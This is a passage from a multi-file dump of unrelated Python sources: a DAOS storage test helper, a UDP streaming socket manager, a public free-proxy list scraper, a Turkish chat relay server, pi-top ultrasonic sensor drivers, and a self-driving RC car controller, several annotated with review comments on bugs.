        self.ior_cmd.get_params(self)
        self.ior_cmd.set_daos_params(self.server_group, self.pool)
        self.log.info("Redundancy Factor : %s", self.test_with_rf)
        self.ior_cmd.dfs_oclass.update(oclass)
        self.ior_cmd.dfs_dir_oclass.update(oclass)
        if single_cont_read is True:
            # Prepare the containers created and use in a specific
            # way defined in prepare_cont_ior_write.
            self.prepare_cont_ior_write_read(oclass, flags)
        elif single_cont_read is False and self.container is not None:
            # Here self.container is having actual value. Just use it.
            self.log.info(self.container)
        else:
            self.fail("Not supported option on ior_thread")
        try:
            job_manager = self.get_ior_job_manager_command()
        except CommandFailure as err_msg:
            self.out_queue.put(err_msg)
            self.assert_on_exception()
        job_manager.job.dfs_cont.update(self.container.uuid)
        self.ior_cmd.transfer_size.update(test[2])
        self.ior_cmd.block_size.update(test[3])
        self.ior_cmd.flags.update(flags)
        # Update oclass settings if using redundancy factor
        # and self.test_with_rf is True.
        if self.test_with_rf is True and \
           "rf" in self.container.properties.value:
            self.log.info(
                "Detected container redundancy factor: %s",
                self.container.properties.value)
            self.ior_cmd.dfs_oclass.update(None, "ior.dfs_oclass")
            self.ior_cmd.dfs_dir_oclass.update(None, "ior.dfs_dir_oclass")
        self.run_ior_with_pool(create_pool=False, create_cont=False,
                               fail_on_warning=fail_on_warning,
                               out_queue=self.out_queue)
        if not self.out_queue.empty():
            self.assert_on_exception()

    def run_mdtest_thread(self, oclass="RP_2G1"):
        """Start mdtest thread and wait until thread completes.

        Args:
            oclass (str): IOR object class, container class.
        """
        # Create container only
        self.mdtest_cmd.dfs_destroy = False
        create_container = 0
        if self.container is None:
            self.add_container(self.pool, create=False)
            create_container = 1
        self.mdtest_cmd.dfs_oclass.update(oclass)
        self.set_cont_class_properties(oclass)
        if self.test_with_checksum is False:
            tmp = self.get_object_replica_value(oclass)
            rf_value = "rf:{}".format(tmp - 1)
            self.update_cont_properties(rf_value)
        if create_container == 1:
            self.container.create()
        job_manager = self.get_mdtest_job_manager_command(self.manager)
        job_manager.job.dfs_cont.update(self.container.uuid)
        # Add a thread for these IOR arguments
        process = threading.Thread(target=self.execute_mdtest)
        # Launch the MDtest thread
        process.start()
        # Wait for the thread to finish
        process.join()
        if not self.out_queue.empty():
            self.assert_on_exception()
stream_manager.py
from socket import *
from struct import pack
from threading import Thread

from src.stream.protocol.packet import ServerboundPacket


class StreamManager:
    """Owns the UDP streaming socket and dispatches incoming datagrams
    to the matching ServerboundPacket subclass."""

    def __init__(self, cefstream):
        self.cefstream = cefstream  # owning app object (provides port + logger)
        self.server = None          # UDP socket, created in launch()
        self.client = None          # (host, port) of the connected peer
        self.packets = []

    def launch(self):
        """Bind the UDP socket on the configured port and wait for a client."""
        port = self.cefstream.get_port()
        self.cefstream.get_logger().info('Streaming Socket *::{port}'.format(port=port))
        self.server = socket(AF_INET, SOCK_DGRAM)
        self.server.bind(('127.0.0.1', port))
        self.listen()

    def listen(self):
        """Block until the first datagram arrives, then start the reader thread."""
        data, address = self.server.recvfrom(1024)
        self.cefstream.get_logger().info('Connection: {address}'.format(address=str(address)))
        client_thread = Thread(target=self.listen_client, args=(self, address),
                               name='ClientThread::{address}'.format(address=str(address)))
        client_thread.start()
        self.client = address
        self.cefstream.get_logger().info('Listening for packets')

    def listen_client(self, stream_manager, address):
        """Read one-byte packet ids forever and dispatch each to the
        ServerboundPacket subclass whose id matches.

        Note: target=self.listen_client already binds self; the extra
        stream_manager parameter absorbs the duplicate self passed via args.
        """
        packets = ServerboundPacket.__subclasses__()
        while True:
            # BUG FIX: recvfrom() returns a (bytes, address) tuple; the id
            # is the one-byte payload, not the tuple itself.
            packet_id, _ = self.server.recvfrom(1)
            received_packet_class = None
            for packet in packets:
                if packet.get_packet_id() in packet_id:
                    received_packet_class = packet
                    break
            # BUG FIX: was "received_packet_class in None", which raises
            # TypeError; an identity test against None was intended.
            if received_packet_class is None:
                # BUG FIX: str + bytes concatenation raises TypeError;
                # convert the id explicitly for logging.
                self.cefstream.get_logger().warn("Unknown packet " + str(packet_id))
                continue
            packet = received_packet_class()
            packet.receive(self.cefstream, self.server)
            self.cefstream.get_logger().info("Message: " + str(packet_id))

    def send(self, packet):
        """Send a packet to the connected client (currently disabled)."""
        if self.client is None:
            return
        # packet.send(self.cefstream, self.server, self.client)

    def shutdown(self):
        """Close the UDP socket."""
        self.server.close()
proxyScraper.py
import requests
from bs4 import BeautifulSoup
import threading
import os
import asyncio
import argparse

# Path of the output file and requested proxy type; both are set from
# the CLI arguments in the __main__ block below.
pathTextFile = ''
proxyType = ''


# From proxyscrape.com
def proxyscrapeScraper(proxytype, timeout, country):
    """Fetch a proxy list from the proxyscrape.com API and append it
    to the output file."""
    response = requests.get("https://api.proxyscrape.com/?request=getproxies&proxytype=" + proxytype + "&timeout=" + timeout + "&country=" + country)
    proxies = response.text
    with open(pathTextFile, "a") as txt_file:
        txt_file.write(proxies)


# From proxy-list.download
def proxyListDownloadScraper(url, type, anon):
    """Fetch a proxy list from proxy-list.download (filtered by type and
    anonymity level) and append the non-empty lines to the output file.

    NOTE(review): lines are written without a trailing newline, so all
    proxies from one response end up on a single line -- confirm intent.
    """
    session = requests.session()
    url = url + '?type=' + type + '&anon=' + anon
    html = session.get(url).text
    if args.verbose:
        print(url)
    with open(pathTextFile, "a") as txt_file:
        for line in html.split('\n'):
            if len(line) > 0:
                txt_file.write(line)


# From sslproxies.org, free-proxy-list.net, us-proxy.org, socks-proxy.net
def makesoup(url):
    """Download url and return it parsed as BeautifulSoup."""
    page = requests.get(url)
    if args.verbose:
        print(url + ' scraped successfully')
    return BeautifulSoup(page.text, "html.parser")


def proxyscrape(table):
    """Extract 'ip:port' strings from the first two columns of an HTML
    proxy table; returns a set of unique entries."""
    proxies = set()
    for row in table.findAll('tr'):
        fields = row.findAll('td')
        count = 0
        proxy = ""
        for cell in row.findAll('td'):
            if count == 1:
                # Second column is the port; join and stop scanning cells.
                proxy += ":" + cell.text.replace('&nbsp;', '')
                proxies.add(proxy)
                break
            proxy += cell.text.replace('&nbsp;', '')
            count += 1
    return proxies


def scrapeproxies(url):
    """Scrape the #proxylisttable table at url and append each proxy to
    the output file, one per line."""
    soup = makesoup(url)
    result = proxyscrape(table=soup.find('table', attrs={'id': 'proxylisttable'}))
    proxies = set()
    proxies.update(result)
    with open(pathTextFile, "a") as txt_file:
        for line in proxies:
            txt_file.write("".join(line) + "\n")


# output watcher
def output():
    """Reset the output file.

    NOTE(review): if the file exists it is removed but NOT recreated --
    the elif can never run in that case. Also, this is invoked *after*
    the scraper threads are started below, so it can delete results the
    threads have already appended (race). Presumably it was meant to run
    before the threads start -- confirm intent before changing.
    """
    if os.path.exists(pathTextFile):
        os.remove(pathTextFile)
    elif not os.path.exists(pathTextFile):
        with open(pathTextFile, 'w'):
            pass


if __name__ == "__main__":
    # NOTE(review): 'global' at module level is a no-op.
    global proxy
    parser = argparse.ArgumentParser()
    parser.add_argument("-p", "--proxy",
                        help="Supported proxy type: http ,https, socks, socks4, socks5",
                        required=True)
    parser.add_argument("-o", "--output",
                        help="output file name to save .txt file",
                        default='output.txt')
    parser.add_argument("-v", "--verbose",
                        help="increase output verbosity",
                        action="store_true")
    args = parser.parse_args()
    proxy = args.proxy
    pathTextFile = args.output
    # One scraper thread per source; each appends to pathTextFile.
    if proxy == 'https':
        threading.Thread(target=scrapeproxies,
                         args=('http://sslproxies.org',)).start()
        threading.Thread(target=proxyListDownloadScraper,
                         args=('https://www.proxy-list.download/api/v1/get', 'https', 'elite',)).start()
        # threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'https', 'transparent',)).start()
        # threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'https', 'anonymous',)).start()
        output()
    if proxy == 'http':
        threading.Thread(target=scrapeproxies,
                         args=('http://free-proxy-list.net',)).start()
        threading.Thread(target=scrapeproxies,
                         args=('http://us-proxy.org',)).start()
        threading.Thread(target=proxyscrapeScraper,
                         args=('http', '1000', 'All',)).start()
        threading.Thread(target=proxyListDownloadScraper,
                         args=('https://www.proxy-list.download/api/v1/get', 'http', 'elite',)).start()
        threading.Thread(target=proxyListDownloadScraper,
                         args=('https://www.proxy-list.download/api/v1/get', 'http', 'transparent',)).start()
        threading.Thread(target=proxyListDownloadScraper,
                         args=('https://www.proxy-list.download/api/v1/get', 'http', 'anonymous',)).start()
        output()
    if proxy == 'socks':
        threading.Thread(target=scrapeproxies,
                         args=('http://socks-proxy.net',)).start()
        threading.Thread(target=proxyscrapeScraper,
                         args=('socks4', '1000', 'All',)).start()
        threading.Thread(target=proxyscrapeScraper,
                         args=('socks5', '1000', 'All',)).start()
        threading.Thread(target=proxyListDownloadScraper,
                         args=('https://www.proxy-list.download/api/v1/get', 'socks5', 'elite',)).start()
        threading.Thread(target=proxyListDownloadScraper,
                         args=('https://www.proxy-list.download/api/v1/get', 'socks4', 'elite',)).start()
        output()
    if proxy == 'socks4':
        threading.Thread(target=proxyscrapeScraper,
                         args=('socks4', '1000', 'All',)).start()
        threading.Thread(target=proxyListDownloadScraper,
                         args=('https://www.proxy-list.download/api/v1/get', 'socks4', 'elite',)).start()
        output()
    if proxy == 'socks5':
        threading.Thread(target=proxyscrapeScraper,
                         args=('socks5', '1000', 'All',)).start()
        threading.Thread(target=proxyListDownloadScraper,
                         args=('https://www.proxy-list.download/api/v1/get', 'socks5', 'elite',)).start()
        output()
sunucu.py
import socket
import threading

# Chat relay server: accepts TCP clients whose IPs are whitelisted in
# onayli_ipler.txt and broadcasts every received message to all clients.
sahip = socket.gethostbyname(socket.gethostname())  # local host IP to bind
port = 8436
baglantilar = []   # currently connected client sockets

# Startup banner (Turkish). NOTE(review): the prompt says "press ENTER
# to continue" but no input() follows -- confirm intent.
print("""
                                      %@@@,,,*@@@
                                 @@@@@@@@%,,,,,*@@@@@@@@*        Red Arrow ağına hoşgeldiniz...
                               /@@@@@@@@@@#,,,,,,,/@@@@@@@@@@@
                              @@@@@@@@@@@@#,,,,,,,,,,@@@@@@@@@@@@
                             @@@@@@@@@@@@@,,,,,,,,,,,,,@@@@@@@@@@@@@
                            @@@@@@@@@@@@@,,,,,,,,,,,,,,,@@@@@@@@@@@@@#
                           .@@@@@@@@@@@@@,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@%
                           @@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@
                          *@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@
                          @@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@
                          @@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@
                           @@@@@@@@@,,,,,,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@*
                           *@@@@@@@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@
                            /@@@@@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@@@@@
                              @@@,,,,,,,,,,,,,,,@@@,,,,,,,,,,,,,,,@@@
                               .,,,,,,,,,,,,@@@@@@@@@@@,,,,,,,,,,,,@
                                 ,,,,,,,,,&@@@@@@@@@@@@@@@@@(,,,,,,,,,
                                  ,,,,,,,&@@@@@@@@@@@@@@@@@@@@@@@@,,,,,,,
                                    ,,,,    #@@@@@@@@@@@@@&     .,,,.

                                     Devam etmek için 'ENTER' bas.
""")

hosgeldin_mesaji = "Kırmızı Ok'a hoşgeldiniz...\n Sunucu bağlantınız başarıyla kuruldu!"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((sahip, port))

onayli_ipler = []  # in-memory cache of whitelisted IPs


def sunucuyu_baslat(TH):
    """Ask for the maximum client count and start listening on the
    bound socket. TH is just a status string to echo."""
    global kullanici_baglandi
    try:
        kullanici_sayisi = input("Maksimum kullanici sayisi: ")
        s.listen(int(kullanici_sayisi))
    except socket.error as bildirim:
        print("Bir hata oluştu: ", bildirim)
    print(TH)


def baglanti_bekle(TH):
    """Accept-loop thread: reloads the IP whitelist from
    onayli_ipler.txt on every connection, then admits whitelisted
    clients and announces them to everyone."""
    print(TH)
    while True:
        global onayli_ipler
        client, addr = s.accept()
        # Re-read the whitelist file so new entries apply without restart.
        # NOTE(review): crashes if onayli_ipler.txt is missing -- confirm
        # the file is guaranteed to exist.
        onayli_ipler_dosya = open("onayli_ipler.txt", "r")
        veri = onayli_ipler_dosya.read()
        for ip in veri.split("\n"):
            if ip in onayli_ipler:
                pass
            else:
                onayli_ipler.append(ip)
                print("kayit bulundu:", ip)
        print(addr)
        onayli_ipler_dosya.close()
        if addr[0] in onayli_ipler:
            print("okey!", onayli_ipler)
            baglantilar.append(client)
            client.send(hosgeldin_mesaji.encode())
            print("<Yeni kullanici> ", addr)
            # Announce the newcomer to every connected client; drop
            # clients whose socket errors out.
            for i in baglantilar:
                try:
                    i.send(str(("<Yeni kullanici> ", addr)).encode('utf-8'))
                except socket.error as hata_kodu:
                    print("[hata]", hata_kodu)
                    baglantilar.remove(i)
                    break
            pass


def mesaj_bekleme(TH):
    """Relay-loop thread: polls every client (100 ms timeout each) and
    broadcasts any received data to all clients."""
    print(TH)
    while True:
        if baglantilar != []:
            for i in baglantilar:
                try:
                    i.settimeout(0.1)
                    veri = i.recv(256)
                    if veri.decode() != "":
                        print(veri.decode())
                        for k in baglantilar:
                            try:
                                k.send(veri)
                            except:
                                # Broken pipe: forget the client.
                                baglantilar.remove(k)
                                print("kullanici Ayrildi!")
                except socket.timeout as hata_kodu:
                    # No data from this client within the poll window.
                    pass


t1 = threading.Thread(target=baglanti_bekle, args=("Baglanti bekleme aktif !", ))
t2 = threading.Thread(target=mesaj_bekleme, args=("Mesaj bekleniyor...",))

sunucuyu_baslat("Sunucu Başlatıldı...")
t1.start()
t2.start()
ultrasonic_sensor_base.py
# Ultrasonic distance sensor support for pi-top [4]: a shared interface plus
# two backends — one driven by the Expansion Plate MCU (analog ports) and one
# bit-banged on a Raspberry Pi GPIO pin via gpiozero.
import atexit
import time
from abc import abstractmethod
from collections import deque
from sched import scheduler
from threading import Event, Lock, Thread

import numpy as np
from gpiozero import SmoothedInputDevice

from pitop.common.common_ids import FirmwareDeviceID
from pitop.common.firmware_device import (
    FirmwareDevice,
    PTInvalidFirmwareDeviceException,
)
from pitop.common.logger import PTLogger
from pitop.common.singleton import Singleton
from pitop.pma.common.utils import get_pin_for_port

from .common.ultrasonic_registers import (
    UltrasonicConfigSettings,
    UltrasonicRegisters,
    UltrasonicRegisterTypes,
)
from .plate_interface import PlateInterface


class UltrasonicSensorBase:
    """Common interface shared by the MCU- and RPi-pin-based backends.

    Distance state is kept as a pair of attributes:
    ``_max_distance`` (metres, the sensor's ceiling) and ``threshold``
    (a 0..1 fraction of max_distance used for active/inactive decisions).
    """

    # Subclass __init__ is expected to overwrite both of these.
    _max_distance = None
    threshold = None

    @property
    def max_distance(self):
        """Maximum measurable distance (same unit the backend reports in)."""
        return self._max_distance

    @max_distance.setter
    def max_distance(self, value):
        if value <= 0:
            raise ValueError("invalid maximum distance (must be positive)")
        # Preserve the absolute threshold distance across the change by
        # recomputing the stored fraction against the new maximum.
        t = self.threshold_distance
        self._max_distance = value
        self.threshold_distance = t

    @property
    def threshold_distance(self):
        """Absolute activation threshold (threshold fraction * max_distance)."""
        return self.threshold * self.max_distance

    @threshold_distance.setter
    def threshold_distance(self, value):
        self.threshold = value / self.max_distance

    @property
    def distance(self):
        """Current distance reading, scaled from the backend's 0..1 value."""
        return self.value * self._max_distance

    # --- abstract interface each backend must provide ---

    @abstractmethod
    def in_range(self):
        raise NotImplementedError

    @abstractmethod
    def value(self):
        raise NotImplementedError

    @abstractmethod
    def pin(self):
        raise NotImplementedError

    @abstractmethod
    def close(self):
        raise NotImplementedError

    @abstractmethod
    def wait_for_active(self, timeout=None):
        raise NotImplementedError

    @abstractmethod
    def wait_for_inactive(self, timeout=None):
        raise NotImplementedError


class CompatibilityCheck(metaclass=Singleton):
    """One-shot (singleton) firmware compatibility gate for the MCU backend.

    Raises RuntimeError if no Expansion Plate is present or its firmware is
    older than the minimum that supports ultrasonic sensing on analog ports.
    """

    __MIN_FIRMWARE_MAJOR_VERSION = 22

    def __init__(self):
        self.check()

    def check(self):
        try:
            firmware_device = FirmwareDevice(FirmwareDeviceID.pt4_expansion_plate)
            if (
                firmware_device.get_fw_version_major()
                < self.__MIN_FIRMWARE_MAJOR_VERSION
            ):
                # NOTE(review): "version version" is doubled in this message.
                raise RuntimeError(
                    "Usage of the analog ports for the Ultrasonic Sensor requires an Expansion Plate with "
                    f"a minimum version version of V{self.__MIN_FIRMWARE_MAJOR_VERSION}. "
                    f"Please update your Expansion Plate firmware to continue."
                )
        except PTInvalidFirmwareDeviceException:
            raise RuntimeError(
                "Please use an Expansion Plate in order to use the analog ports for the Ultrasonic "
                "Sensor."
            )


class UltrasonicSensorMCU(UltrasonicSensorBase):
    """Ultrasonic sensor on an analog port, read via the Expansion Plate MCU.

    Three daemon threads cooperate:
    - a scheduler thread samples the MCU every ``_data_read_dt`` seconds and
      keeps a median-filtered distance,
    - a state-monitor thread fires when_activated/when_deactivated callbacks
      on threshold crossings,
    - (optionally) a queue-fill thread holds off readings until the median
      window is full, when ``partial`` is False.
    """

    __MIN_FIRMWARE_MAJOR_VERSION = 22

    def __init__(
        self, port_name, queue_len, max_distance, threshold_distance, partial, name
    ):
        self._pma_port = port_name
        self.name = name

        # Distance readings
        if max_distance <= 0:
            raise ValueError("invalid maximum distance (must be positive)")
        self._max_distance = max_distance
        # Start the filter at max so the sensor reads "far" until real data arrives.
        self._filtered_distance = max_distance
        self.threshold = threshold_distance / max_distance
        self._data_read_dt = 0.1
        self.__queue_len = queue_len
        # Bounded deque: median over the last queue_len raw readings.
        self.__data_queue = deque(maxlen=self.__queue_len)

        # MCU configuration
        self.__mcu_device = PlateInterface().get_device_mcu()
        CompatibilityCheck()
        self.__registers = UltrasonicRegisters[self._pma_port]
        self.__configure_mcu()

        # User-programmable callbacks
        self.when_activated = None
        self.when_deactivated = None

        # Data state
        self.__partial = partial
        self.__data_ready = False
        self.__active = True

        # Thread communication
        self.__new_reading_event = Event()
        self.__activated_event = Event()
        self.__deactivated_event = Event()

        if self.__partial:
            # partial=True: readings are usable before the window fills.
            self.__data_ready = True
        else:
            self.__queue_check = Thread(target=self.__queue_filled_check, daemon=True)
            self.__queue_check.start()

        # Data read loop
        self._read_scheduler = Thread(target=self.__read_scheduler, daemon=True)
        self._read_scheduler.start()

        # Monitor for changes from active to inactive or vice versa
        self.__state_check = Thread(target=self.__state_monitor, daemon=True)
        self.__state_check.start()

        # Make sure the MCU channel is disabled on interpreter exit.
        atexit.register(self.close)

    def __configure_mcu(self):
        # Enable ultrasonic mode for this port on the MCU.
        self.__mcu_device.write_byte(
            self.__registers[UltrasonicRegisterTypes.CONFIG],
            UltrasonicConfigSettings[self._pma_port],
        )

    @property
    def value(self):
        """Filtered distance as a 0..1 fraction of max_distance.

        Blocks (polling) until the first usable reading is available.
        """
        while not self.__data_ready:
            time.sleep(self._data_read_dt)
        return min(1.0, self._filtered_distance / self._max_distance)

    @property
    def pin(self):
        # MCU-driven sensor: there is no Raspberry Pi pin to report.
        print(
            "An Ultrasonic Sensor connected to an analog port is controlled directly by the MCU and does not have an"
            "associated Raspberry Pi pin. Returning None."
        )
        return None

    def close(self):
        # Write 0x00 to the config register to disable the channel.
        self.__mcu_device.write_byte(
            self.__registers[UltrasonicRegisterTypes.CONFIG], 0x00
        )

    @property
    def in_range(self):
        # "In range" means closer than the threshold, i.e. not active.
        return not self.__active

    def wait_for_active(self, timeout=None):
        self.__activated_event.wait(timeout=timeout)

    def wait_for_inactive(self, timeout=None):
        self.__deactivated_event.wait(timeout=timeout)

    def __read_scheduler(self):
        # sched-based periodic loop; __read_loop re-enters itself each tick.
        s = scheduler(time.time, time.sleep)
        s.enter(self._data_read_dt, 1, self.__read_loop, (s,))
        s.run()

    def __read_loop(self, s):
        self.__data_queue.append(self.__read_distance())
        self._filtered_distance = np.median(self.__data_queue)
        # Pulse the event so waiters wake exactly once per reading.
        self.__new_reading_event.set()
        self.__new_reading_event.clear()
        s.enter(self._data_read_dt, 1, self.__read_loop, (s,))

    def __state_monitor(self):
        while True:
            self.__new_reading_event.wait()
            if self.__data_ready:
                self.__check_for_state_change()

    def __check_for_state_change(self):
        if self.__active and self.__inactive_criteria():
            self.__was_deactivated()
            return
        if not self.__active and self.__active_criteria():
            self.__was_activated()
            return

    def __active_criteria(self):
        # Active = object at or beyond the threshold distance.
        return self._filtered_distance >= self.threshold_distance

    def __inactive_criteria(self):
        return not self.__active_criteria()

    def __was_activated(self):
        if callable(self.when_activated):
            self.when_activated()
        self.__active = True
        self.__activated_event.set()
        self.__activated_event.clear()

    def __was_deactivated(self):
        if callable(self.when_deactivated):
            self.when_deactivated()
        self.__active = False
        self.__deactivated_event.set()
        self.__deactivated_event.clear()

    def __queue_filled_check(self):
        # Only used when partial=False: mark data ready once the median
        # window holds queue_len samples, then exit.
        while True:
            self.__new_reading_event.wait()
            if self.__queue_len == len(self.__data_queue):
                self.__data_ready = True
                break

    def __read_distance(self):
        # MCU reports centimetre-scale integers; /100 converts to the
        # unit max_distance is expressed in. A raw 0 means "no echo",
        # which is treated as maximum distance.
        distance = (
            self.__mcu_device.read_unsigned_word(
                register_address=self.__registers[UltrasonicRegisterTypes.DATA],
                little_endian=True,
            )
            / 100
        )
        if distance == 0:
            return self._max_distance
        return distance


# Modified version of gpiozero's DistanceSensor class that only uses 1 pin
#
# Note: all private member variables are semi-private to follow upstream gpiozero convention
# and to override inherited functions
class UltrasonicSensorRPI(SmoothedInputDevice, UltrasonicSensorBase):
    # Class-level lock so multiple sensors never ping simultaneously.
    ECHO_LOCK = Lock()

    def __init__(
        self,
        port_name,
        queue_len=3,
        max_distance=3,
        threshold_distance=0.3,
        partial=True,
        name="ultrasonic",
    ):
        self._pma_port = port_name
        self.name = name

        SmoothedInputDevice.__init__(
            self,
            get_pin_for_port(self._pma_port),
            pull_up=False,
            queue_len=queue_len,
            sample_wait=0.1,
            partial=partial,
            ignore=frozenset({None}),
        )

        try:
            if max_distance <= 0:
                raise ValueError("invalid maximum distance (must be positive)")
            self._max_distance = max_distance
            self.threshold = threshold_distance / max_distance
            self.speed_of_sound = 343.26  # m/s

            # Echo edge timestamps captured by the pin-change callback.
            self._echo = Event()
            self._echo_rise = None
            self._echo_fall = None
            self.pin.edges = "both"
            self.pin.bounce = None
            self.pin.when_changed = self._echo_changed
            self._queue.start()
        except Exception:
            # Roll back pin ownership if construction fails part-way.
            self.close()
            raise

    def close(self):
        try:
            super(UltrasonicSensorRPI, self).close()
        except RuntimeError:
            # Swallow double-close/teardown races; log for diagnosis.
            PTLogger.debug(
                f"Ultrasonic Sensor on port {self._pma_port} - "
                "there was an error in closing the port!"
            )

    @property
    def value(self):
        """Smoothed 0..1 distance fraction from SmoothedInputDevice."""
        return super(UltrasonicSensorRPI, self).value

    @property
    def pin(self):
        return super(UltrasonicSensorRPI, self).pin

    def _echo_changed(self, ticks, level):
        # Pin-factory callback: record rise/fall tick and wake _read().
        if level:
            self._echo_rise = ticks
        else:
            self._echo_fall = ticks
        self._echo.set()

    def _read(self):
        # Wait up to 50ms for the echo pin to fall to low (the maximum echo
        # pulse is 35ms so this gives some leeway); if it doesn't something is
        # horribly wrong (most likely at the hardware level)
        if self.pin.state:
            if not self._echo.wait(0.05):
                PTLogger.debug(
                    f"Ultrasonic Sensor on port {self._pma_port} - "
                    "no echo received, not using value"
                )
                return None
        self._echo.clear()
        self._echo_fall = None
        self._echo_rise = None
        # Obtain the class-level ECHO_LOCK to ensure multiple distance sensors
        # don't listen for each other's "pings"
        with UltrasonicSensorRPI.ECHO_LOCK:
            # Wait up to 200ms for the echo pin to rise and fall
            if self._echo.wait(0.2):
                if self._echo_fall is not None and self._echo_rise is not None:
                    # Round trip / 2 = one-way distance.
                    distance = (
                        self.pin_factory.ticks_diff(self._echo_fall, self._echo_rise)
                        * self.speed_of_sound
                        / 2.0
                    )
                    return round(min(1.0, distance / self._max_distance), 2)
                else:
                    # If we only saw the falling edge it means we missed
                    # the echo because it was too fast
                    return None
            else:
                # The echo pin never rose or fell - assume that distance is max
                PTLogger.debug(
                    f"Ultrasonic Sensor on port {self._pma_port} - "
                    "no echo received, using max distance "
                )
                return 1.0

    @property
    def in_range(self):
        return not self.is_active
rc_driver_overtake.py
# Python 2 self-driving RC car controller: receives a video stream and
# ultrasonic readings over TCP, runs a trained MLP for steering, and uses
# Haar cascades to react to stop signs and traffic lights.
__author__ = 'robin'

import threading
import SocketServer
import serial
import cv2
import numpy as np
import math

# distance data measured by ultrasonic sensor
sensor_data = " "


class NeuralNetwork(object):
    """Wrapper around OpenCV 2.x ANN_MLP loaded from a trained XML file."""

    def __init__(self):
        self.model = cv2.ANN_MLP()

    def create(self):
        # 38400 inputs = 320x120 grayscale pixels (lower half of a 320x240
        # frame), 32 hidden units, 4 output classes.
        layer_size = np.int32([38400, 32, 4])
        self.model.create(layer_size)
        self.model.load('mlp_xml/mlp.xml')

    def predict(self, samples):
        """Return the index of the highest-scoring output class."""
        ret, resp = self.model.predict(samples)
        return resp.argmax(-1)


class RCControl(object):
    """Sends single-byte drive commands to the car over a serial link."""

    def __init__(self):
        self.serial_port = serial.Serial('COM8', 115200, timeout=1)

    def steer(self, prediction):
        # Command bytes: 1=forward, 7=left, 6=right, 0=stop.
        if prediction == 2:
            self.serial_port.write(chr(1))
            print("Forward")
        elif prediction == 0:
            self.serial_port.write(chr(7))
            print("Left")
        elif prediction == 1:
            self.serial_port.write(chr(6))
            print("Right")
        else:
            self.serial_port.write(chr(0))
            #self.stop()

    def stop(self):
        self.serial_port.write(chr(0))

    def over(self):
        # Overtake maneuver: same byte as "right" (6).
        self.serial_port.write(chr(6))


class DistanceToCamera(object):
    """Monocular distance estimate from the camera's calibrated geometry."""

    def __init__(self):
        # camera params
        self.alpha = 8.0 * math.pi / 180    # camera tilt angle (rad)
        self.v0 = 119.865631204             # principal point, y (px)
        self.ay = 332.262498472             # focal length in y (px)

    def calculate(self, v, h, x_shift, image):
        # compute and return the distance from the target point to the camera
        # v: image row of the object's bottom edge; h: object's known height
        # above camera axis (cm); x_shift: where to draw the label.
        d = h / math.tan(self.alpha + math.atan((v - self.v0) / self.ay))
        if d > 0:
            cv2.putText(image, "%.1fcm" % d,
                        (image.shape[1] - x_shift, image.shape[0] - 20),
                        cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255), 2)
        return d


class ObjectDetection(object):
    """Haar-cascade detection of stop signs and traffic lights.

    Light flags (red/green/yellow) are set here and reset by the caller
    after being acted upon.
    """

    def __init__(self):
        self.red_light = False
        self.green_light = False
        self.yellow_light = False

    def detect(self, cascade_classifier, gray_image, image):
        """Run the cascade on gray_image, annotate image, and return the
        image row (v) of the lowest detection edge (0 if none)."""

        # y camera coordinate of the target point 'P'
        v = 0

        # minimum value to proceed traffic light state validation
        threshold = 150

        # detection
        cascade_obj = cascade_classifier.detectMultiScale(
            gray_image,
            scaleFactor=1.1,
            minNeighbors=5,
            minSize=(30, 30),
            flags=cv2.cv.CV_HAAR_SCALE_IMAGE
        )

        # draw a rectangle around the objects
        for (x_pos, y_pos, width, height) in cascade_obj:
            cv2.rectangle(image, (x_pos + 5, y_pos + 5),
                          (x_pos + width - 5, y_pos + height - 5),
                          (255, 255, 255), 2)
            v = y_pos + height - 5
            # print(x_pos+5, y_pos+5, x_pos+width-5, y_pos+height-5, width, height)

            # stop sign
            # NOTE(review): integer division — any roughly-square detection
            # (width/height ratio in [1,2)) is labelled STOP.
            if width / height == 1:
                cv2.putText(image, 'STOP', (x_pos, y_pos - 10),
                            cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)

            # traffic lights
            else:
                # Locate the brightest spot inside the light housing to tell
                # which lamp is lit.
                roi = gray_image[y_pos + 10:y_pos + height - 10, x_pos + 10:x_pos + width - 10]
                mask = cv2.GaussianBlur(roi, (25, 25), 0)
                (minVal, maxVal, minLoc, maxLoc) = cv2.minMaxLoc(mask)

                # check if light is on
                if maxVal - minVal > threshold:
                    cv2.circle(roi, maxLoc, 5, (255, 0, 0), 2)

                    # Red light: bright spot in upper part of the housing
                    if 1.0 / 8 * (height - 30) < maxLoc[1] < 4.0 / 8 * (height - 30):
                        cv2.putText(image, 'Red', (x_pos + 5, y_pos - 5),
                                    cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)
                        self.red_light = True

                    # Green light: bright spot in lower part of the housing
                    elif 5.5 / 8 * (height - 30) < maxLoc[1] < height - 30:
                        cv2.putText(image, 'Green', (x_pos + 5, y_pos - 10),
                                    cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)
                        self.green_light = True

                    # yellow light
                    # elif 4.0/8*(height-30) < maxLoc[1] < 5.5/8*(height-30):
                    #    cv2.putText(image, 'Yellow', (x_pos+5, y_pos - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 255), 2)
                    #    self.yellow_light = True
        return v


class SensorDataHandler(SocketServer.BaseRequestHandler):
    """Receives ultrasonic distance readings and publishes them via the
    module-level `sensor_data` global read by the video thread."""

    data = " "

    def handle(self):
        global sensor_data
        try:
            while self.data:
                self.data = self.request.recv(1024)
                sensor_data = round(float(self.data), 1)
                # print "{} sent:".format(self.client_address[0])
                print sensor_data
        finally:
            print "Connection closed on thread 2"


class VideoStreamHandler(SocketServer.StreamRequestHandler):
    """Main driving loop: decodes MJPEG frames, runs detection and the MLP,
    and issues drive commands."""

